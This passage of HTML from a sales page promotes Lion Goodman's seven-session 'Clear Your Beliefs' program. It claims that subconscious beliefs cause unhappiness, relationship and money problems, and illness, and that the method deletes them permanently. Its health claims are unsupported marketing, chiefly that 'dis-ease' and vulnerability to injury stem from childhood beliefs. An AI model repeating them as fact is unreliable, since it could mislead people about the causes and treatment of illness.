underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check"><small>\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></small>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle 